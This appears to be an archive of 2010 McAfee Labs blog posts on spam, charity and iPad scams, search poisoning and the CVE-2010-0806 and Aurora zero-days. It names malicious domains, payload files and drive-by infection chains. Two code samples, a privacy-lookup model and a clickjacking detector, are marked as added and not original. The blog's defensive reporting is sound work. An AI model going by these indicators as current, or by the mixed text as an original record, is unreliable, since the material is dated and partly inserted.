Archive for the 'General Computer Security' Category

McAfee Labs Publishes ‘March Spam Report’

McAfee Labs today published its March Spam Report.

This month authors Adam Wosotowsky and Elan Winkler discuss a possible charity scam in France that takes advantage of sympathy for the victims of the Haitian earthquake, examine a “ham campaign” regarding events in Haiti, and look at another fraudulent attempt to connect “lonely women” with victims’ credit cards.

Our key topics:

  • Security professionals working together can expose fraudsters and sometimes bring about their arrests. One of our French researchers shows how it can work.
  • The disaster in Haiti was as usual a spark for spammers, but it also caused a significant amount of legitimate “ham” email.
  • Spammers based primarily in China are keeping busy sending out scams offering Russian “brides” for sale.

For this report and others, many available in up to eight languages besides English, visit our Threat Center Technical White Papers page.

Targeted Internet Explorer Zero-Day Attack Announced (CVE-2010-0806)

Earlier today, Microsoft released Security Advisory (981374). This advisory covers CVE-2010-0806, an unpatched vulnerability affecting Internet Explorer versions 6 and 7. This attack appears to be rather targeted at the moment, but as with other unpatched vulnerabilities in the past, this has the potential to explode now that the word is getting out.

McAfee Labs is aware of an attack emanating from the domain topix21century.com (over both http and https). In this attack, vulnerable users are directed to a malicious webpage that downloads and executes a file named notes.exe or svohost.exe (classified as BackDoor-EMN) in drive-by download fashion (visiting the page is enough to get infected). There are multiple variants of this trojan involved. Notes.exe creates two copies of itself in the %temp% directory, and drops a DLL file. This DLL file is injected into Internet Explorer and provides remote access to an attacker.

The backdoor allows an attacker to perform various functions on the compromised system, including uploading & downloading files, executing files, and terminating running processes. Infected systems may attempt to communicate with the domain notes.topix21century.com over https.

File names related to this attack include:

  • 20100307.htm (CVE-2010-0806 exploit)
  • bypasskav.txt (part of exploit obfuscation code)
    • notes.exe (backdoor installer)
      • note.exe (backdoor installer copy)
      • clipsvc.exe (backdoor installer copy)
        • wshipl.dll (backdoor)
      • rsvm.exe (backdoor installer)
        • wshipnotes.dll (backdoor)

Preliminary product coverage is as follows:

  • McAfee DAT files (antivirus): Coverage will be provided for known exploits as Exploit-CVE-2010-0806 and known payloads as BackDoor-EMN in the 5916 DAT files, releasing March 10.
  • McAfee VirusScan Enterprise Buffer Overflow Protection: Generic Buffer Overflow Protection is expected to cover future exploits.
  • McAfee Host Intrusion Prevention: Generic Buffer Overflow Protection is expected to cover future exploits.
  • McAfee Network Security Platform: The sigset releasing March 9 contains coverage under the signature “HTTP: Microsoft Internet Explorer Code Execution Vulnerability”.
  • McAfee Vulnerability Manager: The FSL/MVM package of March 9 includes a vulnerability check to assess if your systems are at risk.
  • McAfee Web Gateway (formerly Webwasher): TrustedSource has coverage for domains and IP addresses that the malware contacts.
  • McAfee Firewall Enterprise (formerly Sidewinder): TrustedSource has coverage for domains and IP addresses that the malware contacts.
  • McAfee SiteAdvisor, SiteAdvisor Plus, SiteAdvisor Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts.

McAfee Labs is investigating this attack further and will continue to monitor any related activity closely.

Apple Announces iPad Availability: Watch Out for Scams!

Last week Apple formally announced the launch date for the Wi-Fi version of its much anticipated new tablet computer, the iPad. As with most events that generate a lot of media and consumer interest, this one also generated curiosity from the spammer community. They wonder how they can leverage this event to steal your sensitive information. 

Scams have already started to surface, claiming how you can win your own iPad for free. All you need to do is provide your address for shipment, and … Oh, yeah, to get your “free” iPad you also need to purchase something, which will require you to give us your credit card details. There had to be a catch somewhere.

Here is an example of such an email:

This scam is basically your typical “free offer” scam, but given the popularity and buzz surrounding any Apple product announcement, it’s essential to distinguish the legitimate from the “too good to be true.” As the release date for the iPad approaches, more scams such as this are likely to emerge, using email, social media technologies, and common search engine terms for delivery.

Keep your eyes open, be diligent, and if you question whether any kind of offer you receive in email or on the web is legitimate, you should follow your instincts. Such offers are likely to be bogus.

On Olympics, St. Patrick’s Day, Screensavers, and Wallpaper

The combination of search engine optimization with sporting and holiday news continues to fascinate me. Oh, and did I mention malware and malicious websites? They always make for interesting bedfellows.

The Olympics have been getting massive coverage, of course, and St. Patrick’s Day is just around the corner. We can count on these events to provide cybercriminals with plenty of search engine manipulation possibilities and social engineering lures.

I ran a few basic Google searches and got pretty much what I expected: malicious sites and malware links. Starting with some basic Olympics-based searches, first for Olympic Games Wallpaper:

Malicious Olympic Wallpaper Search

For this search three of the top five results lead to malicious links (not good). The next search moved onto Olympics-themed screensavers (which historically are heavily abused):

Malicious Olympic Screensavers

In this case two of the 10 results on the first page lead to malicious websites–actually less than I expected. But look what happened when I added the word download to my search:

Malicious Olympic Screensaver Download Search

In this case five of the 10 results on the first page were now malicious or questionable. Quite interesting. When I added an -s to download my results “improved” to six malicious entries!

Next I moved on to the theme of St. Patrick’s Day for wallpaper and screensavers. Lo and behold, just about the same types of results:

St Patrick's Day Wallpaper Search

For wallpaper, just shy of half the results on the first page lead to some very nasty sites indeed. Next I also searched for themed screensavers:

St Patrick's Day Screensaver Search

Again, just about half the results on the first page lead to malicious links. That’s not surprising but certainly not good. Just remember this trend: news, sporting events, and holidays are common abuse targets for cybercriminals. Be suspicious when searching for info in any of these areas (and in many others). Safe-searching technologies such as SiteAdvisor are more important than ever.

Today’s cybercriminal is smart and prepared. Let’s all be smarter and better prepared.

Valentine’s Day Searches Lead to Malware

5, 4, 3, 2, 1…malware!

It’s like clockwork, ain’t it? A popular holiday–such as Valentine’s Day–approaches and malware authors and cybercriminals ready for it.

I have done some Valentine’s Day searches for poisoned terms and found some nasty ones very quickly. Screensavers and ecards are always popular:

Valentine ScreenSavers

Valentine eCards

Even Rolex watches on Valentine’s Day are not safe:

Valentine Rolex

Some of the poisoned terms I have seen today:

Valentine’s Day Screensavers
Valentine’s Day Downloads
Valentine’s Day Wallpaper
Valentine’s Day Rolex
Valentine’s Day eCards
Animated Valentine’s Day
Valentine’s Day Greetings
Valentine’s Day Cupids
Valentine’s Day Gift Ideas

Make sure you surf safely with SiteAdvisor and keep that machine updated!

McAfee Labs Quarterly Threat Report Posted

Today we unveiled our Threats Report for the fourth quarter of 2009. It highlights many of the most significant spam-generating stories in 2009 as well as the rise of political hacktivism in countries such as Poland, Latvia, Denmark, and Switzerland. The report’s findings also reveal that 2009 averaged approximately 135.5 billion spam messages per day; yet spam volume decreased by 24 percent in Q4 compared with Q3.

Spammers piggybacked heavily on leading headlines in 2009, taking advantage of breaking news stories, global tragedies, and other timely events. The Air France plane crash and Michael Jackson’s death were among the top tragedies exploited by spammers last year. McAfee researchers also noted a significant number of 2010 FIFA World Cup-themed phishing scams, Zeus Trojans masked as the CDC and referencing the H1N1 vaccine program, and “get rich quick” scams due to the rise of U.S. unemployment levels.

Politically motivated attacks are on the rise around the world, targeting popular social networking destinations, as seen recently with the Iranian Cyber Army’s political attack aimed at Twitter. The report confirms that the United States is not the sole target, nor is China the sole origin for these types of assaults. Recent political attacks targeted the Polish government, the Copenhagen Climate Conference, and Latvia’s Independence Day.

Malware–including fake security software, attacks on social networks, and AutoRun USB infections–continued to rise significantly last year. Internet-based, Web 2.0-centric attacks and threats on portable storage devices played a huge role in 2009, contributing greatly to the immense increase in threats and demonstrating how the nature of computer threats is evolving over time. Cybercriminals used social networking sites to target a new generation of victims, with Koobface activity increasing considerably during the latter part of 2009. Koobface is now hosted by servers in 46 countries, with the United States, Germany, and Denmark making up the top three hosting locations.

China Overtakes the U.S. as No. 1 Country Producing Zombies

Zombie production in the U.S. dropped significantly, from 13.1 percent in Q3 to 9.5 percent in Q4, making China the top Zombie-producing country at 12 percent. Brazil ranked third, with Russia and Germany rounding out the top five countries. The United States still remains the number one country in spam production, with Brazil and India taking the number two and three spots. Ukraine and Germany joined the list of top 10 countries producing spam for the first time in 2009.

The Geographic Distribution of Web Threats

North America is the worldwide leader in hosting malicious content, with Europe/Middle East/Africa second, followed by Asia/Pacific. In Europe, Germany holds the number one spot, followed by the Netherlands and Italy. China is the chief host for malicious content in Asia, followed by Russia and South Korea. South America is beginning to play a larger role, with Brazil as the top hosting country in that region.

China is the Worldwide Leader in SQL-Injection Attacks

Although SQL-injection attacks originate from a number of countries across the globe, China was by far the number one country hosting these assaults, at 54.4 percent. Due to the growing popularity of Adobe applications, McAfee Labs saw a number of client-targeted attack attempts to exploit Flash and Acrobat Reader.

A full copy of the Q4 2009 Threats Report is available here.

Protecting Privacy by Design

This guest post was written by Benjamin Edelman, Assistant Professor at Harvard Business School and an advisor to McAfee.

Last week I revealed troubling transmissions by the Google Toolbar: Even when a user specifically “disable[s]” the Google Toolbar, and even when the Toolbar disappears from view, the Toolbar continues tracking users’ online behavior—including specific web pages visited and specific searches run on other search engines. To Google’s credit, after I posted my article Google promptly fixed these nonconsensual transmissions—but big questions remain. How did this bug slip through Google’s internal testing? What happens to the data Google collected without user consent? And why was Google collecting this data in the first place?

Rethinking Disclosure
I’ve recently begun talking to all the Google Toolbar users I can find. Checking their PCs, I see that they usually have Google’s “Enhanced Features” turned on—meaning Google is tracking their every page view and every search. But they usually don’t know about that tracking. Why not? They were told—but not in a way they understood or remembered.

For one, Google discloses its tracking in a “bubble” pop-up that appears immediately after Toolbar installation. By all indications, the installation is complete, and users just want to get back to work—not answer more questions or make more decisions. This suggests a first principle: Seek consent when users are inclined to make an informed decision. This should be an integral part of an installation, not an afterthought.

Beyond the timing of disclosure, the substance of disclosure is also crucial. Google’s current installation says Enhanced Features will “tell us [Google] what site you’re visiting by sending Google the URL.” What exactly does that mean? Will Google track “sites” (such as “nytimes.com” for the New York Times) or “URLs” (referencing specific articles and searches)? Remarkably, Google’s disclosure is internally inconsistent: Google uses the terms sites and URLs interchangeably, when in fact the concepts are quite different. Certainly that’s improper. Disclosures should be clear, precise, and entirely accurate.

Communications professionals have expertise to offer. To make a disclosure clear, it should appear in a dedicated screen with a title, layout, and format that emphasize what’s important. Headings, topic sentences, and sentence structure can help users understand. How does Google stack up on these fronts? Unfortunately, Google seeks permission for Enhanced Features in a screen entitled “Introducing Sidewiki”—a marketing pitch for a new feature, hardly alerting users to the serious privacy matters that follow. Better alternatives would be “Important Privacy Decision” or “Set Your Privacy Preferences”—identifying the crux of the question and introducing the material that follows. This crucial screen should seek to inform, not to persuade. Most of all, it should be designed by policy professionals and communication professionals—not marketers.

A user seeking more information should be able to review a further document with appropriate details. Here, too, accuracy and precision are crucial, and Google’s current approach falls well short. Google’s statement makes no mention of these Toolbar transmissions until Page Five. Even there, Google’s text contradicts itself, both explicitly and through unavoidable interpretation of Google’s statements and omissions (details). Equally striking is Google’s defective formatting: Google loads its privacy notice in a browser window with no menu or toolbar—hence no ability for users to copy, search, save, or print these important materials. These design decisions are ill advised. Disclosures should be user friendly and should encourage users to take the time to understand them.

For these sensitive transmissions, which continue every time a user runs a web browser, disclosure need not occur just once. When a program has such important privacy consequences, it should remind users of its effects from time to time, employing an alert or message to make sure users are still onboard. A periodic reminder—perhaps once per quarter, or whenever Google Toolbar auto-upgrades to a new version—would help users remember what’s installed.

Improving the Substance of Privacy Protection
Good privacy means more than disclosure. Through sensible adjustment of data collection and retention practices, software developers can dramatically reduce the privacy implications of their services.

For one, companies should reexamine what data they collect in the first place. Do many users actually want the features purportedly justifying detailed tracking? When it comes to Google Toolbar, I have my doubts: I don’t think many users want to know page-level PageRanks. Nor does Google Sidewiki feature a quantity or quality of comments sufficient to justify the significant privacy intrusion. My guiding principles: Provide genuine value, and put users’ interests first. Collect data only when there is a compelling immediate reason, in the user’s personal interest, to do so. An amorphous benefit, such as improving service or building a community, is not good enough.

Systems should transmit as little information as possible to satisfy a user’s request. Consider two alternative approaches to tell a user the PageRank popularity of a site. In a first system, the user’s computer sends a server the full URL of the user’s request, and the server returns the PageRank of that specific page. Alternatively, the user could send just the domain name at issue, and the server could return a list of popular URLs and PageRanks on that domain. With the right system of wildcards and aggregation, the latter approach need not use much more bandwidth, and it’s a modest and reasonable increase in complexity. But the privacy benefits are dramatic: In the first system, the server learns each user’s every page view, whereas the second keeps specific page views confidential.
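To make the comparison above concrete, here is an added toy model of the two PageRank lookup designs (not code from the original post or from Google): the rank table, the server, its request log and the URLs are all constructed, and the "server log" stands in for whatever the operator would retain.

```python
# Added example (not from the original post): a toy model of the two PageRank
# lookup designs compared above. The rank table, server and URLs are constructed.
from urllib.parse import urlsplit

# Constructed rank table held by the server: full URL -> PageRank (0-10).
RANK_TABLE = {
    "http://example.org/": 7,
    "http://example.org/articles/1": 4,
    "http://example.org/articles/2": 3,
    "http://example.org/private/medical-results": 1,
    "http://other.test/": 5,
}


class RankServer:
    """Toy server that keeps a log of every request it receives, so we can
    compare what each design reveals to the operator."""

    def __init__(self, table):
        self.table = table
        self.log = []

    def rank_for_url(self, url):
        """Design 1: the client sends the exact URL, so the server log records
        every page the user views."""
        self.log.append(url)
        return self.table.get(url, 0)

    def ranks_for_domain(self, domain):
        """Design 2: the client sends only the host name; the server returns all
        ranked URLs it knows on that host and never learns which one was viewed."""
        self.log.append(domain)
        return {u: r for u, r in self.table.items()
                if urlsplit(u).hostname == domain}


def toolbar_design1(server, url):
    """Client side of design 1: one request per page view, carrying the full URL."""
    return server.rank_for_url(url)


def toolbar_design2(server, url):
    """Client side of design 2: fetch the domain listing, then resolve the
    specific page locally (falling back to the site root's rank when the page
    is not in the listing). The specific path never leaves the client."""
    parts = urlsplit(url)
    listing = server.ranks_for_domain(parts.hostname)
    root = f"{parts.scheme}://{parts.hostname}/"
    return listing.get(url, listing.get(root, 0))


def server_learned_page(server, url):
    """True if the server log contains the exact page the user visited."""
    return url in server.log


def compare(url):
    """Run the same page view through both designs and report the rank each
    returns together with what each server log ended up holding."""
    s1, s2 = RankServer(RANK_TABLE), RankServer(RANK_TABLE)
    return {
        "design1": (toolbar_design1(s1, url), list(s1.log)),
        "design2": (toolbar_design2(s2, url), list(s2.log)),
    }


if __name__ == "__main__":
    print(compare("http://example.org/private/medical-results"))
```

Both designs return the same rank for the page, but only the first leaves the full URL in the server's log; the second still reveals which hosts a user visits, so it withholds page-level detail, not the visit itself.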

Finally, companies should limit data storage and its use with specific, firm commitments. Key questions: How long will data be retained? Who will have access and for what purposes? Although these questions sound obvious, they’re easy to overlook. Tellingly, you won’t find answers in Google’s Toolbar Privacy Policy, and even Google’s main Privacy Policy is silent on key details.

The Big Picture
My basic goal: Build privacy into the system. Collect less data, and collect data only when it’s actually in the users’ interest. Make sure users truly know what they’re accepting and why. Treat privacy protection as a valuable objective in its own right, not merely a hurdle standing between a company and a desired business opportunity. This may be tough medicine for those who seek to profit from tracking users in ever-greater detail, but it’s the right thing to do.

Hackers Disrupt European CO₂ Market

In recent weeks, various cybercrime attacks have disrupted the computer systems that allow nations to manage their national greenhouse-gas emissions quotas and their possession of carbon assets according to international agreements (the Kyoto Protocol and the European system). One quota is the right to emit the equivalent of one ton of carbon dioxide during a specified period.

The initial attack targeted the Danish CO₂ quota register that was shut down on January 12. The Danish authorities took this decision after registry users received a fake email purporting to originate from the Danish Energy Agency and redirecting the recipients to a mirror site to steal their credentials.

It seems the attackers renewed their attempt last week by sending similar emails to carbon financial services in 13 European countries. Here, too, the goal was the theft of usernames and passwords to gain access to the national CO₂ quotas management systems. This caused another quota-market closure.

Using these credentials, hackers–instead of manufacturers, governments, and brokers–would in theory be able to sell and buy quotas. During the past 18 months, fraud on the CO₂ market has caused a tax loss of €5 billion. Such access would also be useful for the biggest emitters of carbon dioxide; those countries could manipulate the international quotas to reduce their penalties. The following graphic, from Europol (the European Law Enforcement Agency), explains how such fraud can occur.

One thing is sure: the people behind these attacks cannot be simple hackers. They are likely in the pay of rogue states that reject rules-based international trade.

Scams Take Advantage of Haiti Relief Efforts

Never is the heartless nature of cybercriminals more apparent than in the wake of a tragedy. As relief efforts continue and worldwide aid pours in to help those affected by the earthquake that rocked Haiti on January 12, cybercriminals have not slowed their efforts. They are eager to get you to donate money that the people of Haiti will never see. Spoofing legitimate relief organizations such as the Red Cross is a typical social engineering lure used by the bad guys to take your money. This morning, however, a particular scam caught my eye that I wanted to share with you. Its subject line was “Help for Haiti” and was sent by “b.obama@whitehouse.gov.” Mr. “b.obama” writes:

President Barack Obama

On Tuesday, a catastrophic earthquake struck near Port-au-Prince, Haiti. The full extent of the damage is still being assessed, but the death toll — already in the thousands — is climbing fast.

This is the worst earthquake to hit the area in more than 200 years. Entire communities have been ripped apart and as many as 3 million people have been directly affected, including tens of thousands of American citizens who are in Haiti.

Our neighbors in Haiti are racing to confront the enormous devastation — and the OFA community can help.

Read down for more information about essential relief efforts and ways you can help today.

Footage is pouring in of homes collapsing, Haitians carrying injured family members, and hospitals being overrun in what was already the poorest nation in the Western Hemisphere.

I have directed my administration to respond with a swift, coordinated, and aggressive effort to save lives. Personnel from the United States and our partners in the international community are on the ground in damaged areas right now, working side by side with the Haitian people. They’re providing much-needed food, water, and sanitation supplies, saving lives and helping local communities start to rebuild.

Despite the fact that we are experiencing tough times here at home, I encourage those who can to reach out and help. It’s in times like these that we must show the kind of compassion and humanity that has defined the best of our national character for generations.

Read here to find out what you can do:

Obama In The United Kingdom

Help Haiti

Western Union Details

Name: XXXXXXXX

Country: United Kingdom

Call us On +XXXXXXXXXX
Any Funds given to the good people of America Here in The UK will be shared amongs Red Cross and all relief agencies.No amount is too small.

As this story continues to unfold, I hope you will continue to keep the people of Haiti in your thoughts and prayers, as well as the many Haitian-Americans who have done so much to enrich our country and who are worried about friends and loved ones in this time of need.

Thank you,

President Barack Obama

I’ve censored some of the contact information so that nobody visiting this blog will attempt to send money to the people responsible for this scam. I cannot emphasize enough that you must perform due diligence before donating to any charity. Ensure that the money you donate is going to the cause that you choose.

A couple of things to remember:

  • Don’t respond to emails requesting donations, credit card information, or other sensitive information that you do not feel comfortable giving
  • Don’t click links within email that direct to donation websites, as they may be directing you to a malicious website under the covers
  • Don’t open attachments with donation forms, as they may be executable malware
  • Work directly with charity organizations that you know and trust

Cybercriminals prey on the emotions of their victims. That’s why social engineering tactics such as these are successful. However, if you do your homework first, follow safe email and web-browsing habits, and work closely only with reputable charities to donate money, you can feel more comfortable that your sensitive information won’t end up in the wrong hands.

Update on Recent Microsoft 0day (CVE-2010-0249)

Here’s a quick update on CVE-2010-0249, aka the Aurora exploit.  A few days ago exploit code was made public.  Since then malware authors have been customizing the exploit’s payload to install their own malicious creations.  Much of the field telemetry we’ve been receiving has been coming from McAfee users in China visiting websites in China.  Some users have been directed to malicious sites from blog and forum posts, while other cases involve compromised web pages that use multiple JavaScript files and iframes to pull in the malicious content.

The exploits are often served from subdomains of 3322.org and 8866.org.  A common filename is ie.html, which references what.jpg, which contains part of the exploit code (and not a JPEG image).  Some payloads we have seen download files named down.css and log.css, which are malware executables.  Those executables contain functionality to download other malware, including:

  • Artemis!629E2332CFDA – Generic PWS.y!bsk
  • Artemis!78043EBA321B – PWS-Mmorpg!la
  • Artemis!911BCF95C022 – PWS-OnlineGames.gx
  • Generic Downloader.x!coe
  • Generic Dropper!byp
  • Generic PWS.y!bsk
  • PWS-Mmorpg!la
  • Suspect-02!50CB7D4BB04E – Generic Dropper.hi
  • Suspect-26!4EBF601DCBF6 – PWS-Mmorpg!la
  • Suspect-26!6D89EB2792F7 – PWS-Mmorpg!hb
  • Suspect-26!B01B63F88994 – PWS-Mmorpg!la

Given that exploit code is readily available, this is likely the tip of the tip of the iceberg in terms of the domains and malware we are likely to see over the next few weeks (and we can expect to see new exploit and related malware variants for many months, if not years, to come).

Earlier today, Computer World reported that private exploits were created that exploit Internet Explorer 7 & 8, but that those exploits would remain private.  Still, this publicity may entice others to meet the challenge and go public to prove their prowess.

On the bright side, Microsoft said today that they would release an out-of-cycle patch for this vulnerability.  McAfee Labs advises those tempted to install an unofficial patch to think twice before doing so, as malware and adware often arrive under the guise of such a “fix”.

Investigating a Possible Charity Scam

On Saturday, my McAfee Labs colleague Craig Schmugar wrote about phishing sites and email scams related to the recent earthquake in Haiti. The people behind these frauds deserve to be caught by the law. I have a story that demonstrates that when several researchers join forces the bad guys run the risk of being punished.

On Sunday, among the hundreds of emails I received about Operation Aurora, I had one from Nick FitzGerald, a well-known anti-malware researcher. He asked for my opinion about a possible charity scam with a French origin.

Nick asked me to verify the details: an easy thing for a French speaker. After I tried calling the mobile phone number and got an answering machine, I contacted the town hall where the requester claimed to have his company. The official in charge did not know this company nor any local initiative in favor of the Haitian people.

Two Internet searches allowed me to identify a possible sender. First of all, I used the phone number and discovered–in the same administrative division–an individual selling a Mercedes.

As I suspected another rip-off (you pay an advance fee and you never see your car), I used the company name and discovered a professional diary with the name of the managing director: the same name as the car seller.

Finally, and just as I prepared my response to Nick, I received a call from some friends working at the French banking industry’s Computer Emergency Response Team. They had made the same discoveries, and they were also able to direct me to some court rulings related to this person. He was sentenced in 2009 after he used false insurance certificates and false bank guarantees.

Yesterday, I forwarded all this data to the authorities and hope that they will take appropriate steps. I cannot claim that this individual is once again breaking the law; in France we do enjoy the presumption of innocence. However, this story should prompt you to be vigilant and to not fall for email charity scams.

Last week the U.S. FBI released a warning on this subject.  Yesterday, they renewed the message with the following guidelines:

  • Do not respond to any unsolicited (spam) incoming emails, including clicking links contained within those messages
  • Be skeptical of individuals representing themselves as surviving victims or officials asking for donations via email or social networking sites
  • Beware of organizations with copycat names similar to but not exactly the same as those of reputable charities
  • Rather than following a purported link to a website, verify the legitimacy of nonprofit organizations by using various Internet-based resources to confirm the group’s existence and its nonprofit status
  • Be cautious of emails that claim to show pictures of the disaster areas in attached files, because the files may contain viruses. Open attachments only from known senders.
  • To ensure your money is received and used for its intended purposes, make contributions directly to known organizations rather than relying on others to make the donation on your behalf
  • Do not be pressured into making contributions, as reputable charities do not use such tactics
  • Do not give your personal or financial information to anyone who solicits contributions. Providing such information may compromise your identity and make you vulnerable to identity theft.
  • Avoid cash donations if possible. Pay by debit or credit card, or write a check directly to the charity. Do not make checks payable to individuals.

I strongly agree with this advice!

McAfee ‘Hacking Exposed’ Webcast Series Fights Cybercrime

We are pleased to announce the next event in our complimentary monthly “Hacking Exposed Live!–A Webcast Series,” which educates attendees to protect against cybercrime and hackers. The monthly webcast, hosted by Hacking Exposed coauthor and McAfee Senior Vice President Stuart McClure, walks attendees through the latest hacking techniques and explains countermeasures for preventing attacks.

The next webcast is January 21 at 11 a.m. Pacific time (2 p.m. Eastern) and will feature two white-hot security topics: Botnets and Aurora–the zero-day vulnerability that last week struck Google and several other well-known companies. McAfee Worldwide Chief Technology Officer George Kurtz and McAfee Senior Director Greg Brown will join McClure to enlighten the audience on how hackers exploit these vulnerabilities and what can be done to prevent them from impacting businesses.

Based on the best-selling security book Hacking Exposed, this live monthly webcast gives attendees deep insights into current and evolving hacks and what they can do to keep their environments protected. The webcasts include everything attendees need to know to stay ahead of those who would cause harm. The sessions will also address the universe of hacks–involving social media, mobile, Unix, and more.

Click here to learn more and register today.

Went Looking for IE Exploits in “Haiti”, Found Something Else

In my last post I mentioned that the “Operation Aurora” exploit code was public and that we could expect other attacks leveraging the CVE-2010-0249 exploit to emerge.  Given the significance of the recent earthquake in Haiti, and the slew of phishing sites, email scams, etc., it makes sense that attackers would try to combine an unpatched Internet Explorer vulnerability with Haiti-related web content.

I figured a good way to look for attackers was to Google the most popular search terms of the day.  It’s been a while since I last researched search engine manipulation.  As expected, it was quite easy to find high-ranking search results for Haiti-related terms; the vast majority led to malicious rogue antivirus sites, similar to earlier blogs.  I did not come across any sites exploiting the recent zero-day IE vulnerability.  However, I did come across plenty of clickjacking, and not just clickjacking: the attackers have incorporated Google Trends, Digg.com, blackhat SEO, and clickfraud as well.

Here’s the apparent flow of the attack:

The attacker finds a hot search term using Google Trends or some other keyword tracking site (and perhaps anticipates term variations):

Next, they create the malicious web page (more below) and submit an entry to Digg.com using the same title, and a description that includes a bunch of relevant terms.  They also Digg the story (+1):

Seemingly the affiliation with Digg.com, the association of the title (taken from Google Trends), and description help boost the ranking in Google’s search results:

When a user follows the link on Digg.com, they are taken to a generic website enticing them to click on a “Play” icon.

What the user doesn’t see is the content that sits behind the image.  When a user clicks on the image, that click is passed along to an advertisement delivered through Google’s ad network (note the sites in the image below are potential victims here too as they could be charged for “unwanted clicks” on their ads).

This form of Clickfraud can generate money for the attacker.  If this fraud goes unnoticed, the advertiser would likely pay a referral fee to the attacker.
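As an added example (not code from the original post), the following JavaScript implements a crawler-side heuristic for the overlay pattern described in the flow above: a visible “Play” image with a transparent third-party frame stacked over it so that the click lands on the ad. The element record format and the sample page are constructed assumptions, not data from the site discussed.

```javascript
// Added example, not part of the original post: flag the overlay trick where a
// visible bait image covers (or sits under) a transparent third-party iframe.
// Element records are a constructed, simplified form of what a crawler could
// collect with getBoundingClientRect() and getComputedStyle(); the field names
// (id, tag, src, rect, opacity, zIndex, pointerEvents, visibility) are assumed.

const MIN_OVERLAP = 0.5;   // fraction of the bait's area the frame must cover
const MAX_OPACITY = 0.1;   // frames this transparent are treated as hidden

// Fraction of the bait rectangle that the frame rectangle covers (0..1).
function overlapFraction(bait, frame) {
  const a = bait.rect, b = frame.rect;
  const w = Math.min(a.x + a.w, b.x + b.w) - Math.max(a.x, b.x);
  const h = Math.min(a.y + a.h, b.y + b.h) - Math.max(a.y, b.y);
  if (w <= 0 || h <= 0 || a.w <= 0 || a.h <= 0) return 0;
  return (w * h) / (a.w * a.h);
}

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch (e) { return null; }
}

function isHidden(el) {
  return (el.opacity !== undefined && el.opacity <= MAX_OPACITY) ||
         el.visibility === "hidden";
}

// Returns one finding per (bait, frame) pair that matches the overlay pattern.
// Only frames whose host differs from the page host are considered, since the
// pattern in the post uses an ad served from another origin.
function findClickjackOverlays(elements, pageHost) {
  const host = pageHost.toLowerCase();
  const baits = elements.filter(e =>
    ["img", "button", "a"].includes(e.tag) && !isHidden(e));
  const frames = elements.filter(e =>
    e.tag === "iframe" && hostOf(e.src) !== null && hostOf(e.src) !== host);
  const findings = [];
  for (const bait of baits) {
    for (const frame of frames) {
      const overlap = overlapFraction(bait, frame);
      if (overlap < MIN_OVERLAP) continue;
      const frameOnTop = (frame.zIndex || 0) >= (bait.zIndex || 0);
      if (isHidden(frame) && frameOnTop) {
        // Classic case: invisible frame above the image receives the click.
        findings.push({ bait: bait.id, frame: hostOf(frame.src), overlap,
          reason: "transparent third-party frame stacked over visible bait" });
      } else if (bait.pointerEvents === "none" && !frameOnTop) {
        // Variant: image is on top but lets clicks fall through to the frame.
        findings.push({ bait: bait.id, frame: hostOf(frame.src), overlap,
          reason: "bait passes clicks through to frame beneath it" });
      }
    }
  }
  return findings;
}

// Constructed sample page: a "Play" image with a transparent ad frame over it,
// a legitimate visible embed elsewhere, and a hidden frame that overlaps nothing.
const SAMPLE_ELEMENTS = [
  { id: "play", tag: "img", src: "https://example.org/play.png",
    rect: { x: 100, y: 100, w: 300, h: 200 }, opacity: 1, zIndex: 1 },
  { id: "ad", tag: "iframe", src: "https://ads.example.net/show?unit=1",
    rect: { x: 90, y: 90, w: 320, h: 220 }, opacity: 0.01, zIndex: 10 },
  { id: "video", tag: "iframe", src: "https://videos.example.net/embed/1",
    rect: { x: 500, y: 100, w: 400, h: 300 }, opacity: 1, zIndex: 1 },
  { id: "offscreen", tag: "iframe", src: "https://ads.example.net/show?unit=2",
    rect: { x: -1000, y: -1000, w: 300, h: 250 }, opacity: 0, zIndex: 10 },
  { id: "banner", tag: "img", src: "https://example.org/banner.png",
    rect: { x: 0, y: 0, w: 900, h: 60 }, opacity: 1, zIndex: 0 },
];

function runSample() {
  return findClickjackOverlays(SAMPLE_ELEMENTS, "example.org");
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(runSample(), null, 2));
}
```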

The web server shows many search terms seeded this way, including several related to Haiti:

  • haiti-breaking-news
  • haiti-earthquake-damage
  • haiti-earthquake-info
  • haiti-earthquake-relief
  • haiti-earthquake-time
  • haiti-pact-with-the-devil
  • haiti-pat-robertson
  • haiti-relief-effort
  • haiti-support
  • haitian-earthquake-relief
  • haitian-relief-efforts
  • hatia-earthquake-pictures

I should note that this isn’t so much a Haiti-targeted attack, but rather an attack targeted at any popular topic on the web right now.  In fact, they’re poisoning the term “internet security 2010 virus removal”, which exists because web users fell victim to rogue antivirus software, some undoubtedly due to the same type of search engine poisoning.

“Operation Aurora” Leading to Other Threats

Operation Aurora has received a lot of attention over the past couple of days.  To recap, Google, Adobe, and many other companies were attacked with code exploiting a zero-day vulnerability in Internet Explorer.  Since the announcement of this vulnerability (CVE-2010-0249), exploit code has been made public and already revised into a more usable form.

History tells us that when exploit code targeting an unpatched vulnerability in popular software is released, a slew of attackers are ready, willing, and able to capitalize.  What started out as a sophisticated targeted attack is likely to lead to large-scale attacks on vulnerable Microsoft Internet Explorer users.  This often takes the form of drive-by download sites serving malware to unsuspecting users, lured by links spammed in email, social networking sites, blogs, and poisoned search engine results.

For more information on this vulnerability, the Operation Aurora attack, and ways to protect your environment see:
More Details on “Operation Aurora”

More Details on “Operation Aurora”

Earlier today, George Kurtz posted an entry, ‘Operation “Aurora” Hit Google, Others’, on McAfee’s Security Insight blog.  The purpose of this post is to answer questions about this particular attack and fill in some of the threat flow and McAfee coverage details.

How were systems compromised?
When a user manually loaded/navigated to a malicious web page from a vulnerable Microsoft Windows system, JavaScript code exploited a zero-day vulnerability in Internet Explorer, the Microsoft Internet Explorer DOM Operation Memory Corruption Vulnerability.  Microsoft has released Security Advisory (979352) for this vulnerability (CVE-2010-0249).

What was the payload of the exploit?
Once a system was successfully compromised, the exploit was designed to download and run an executable from a site, which has since been taken offline.  That executable installed a remote access Trojan to load at startup.  This Trojan also contacted a remote server.  This allowed remote attackers to view, create, and modify information on the compromised system.

How widespread is this attack?
Aurora appears to have been a very concentrated attack on specific targets.  It is not believed to be widespread at this time.

How serious is this vulnerability?
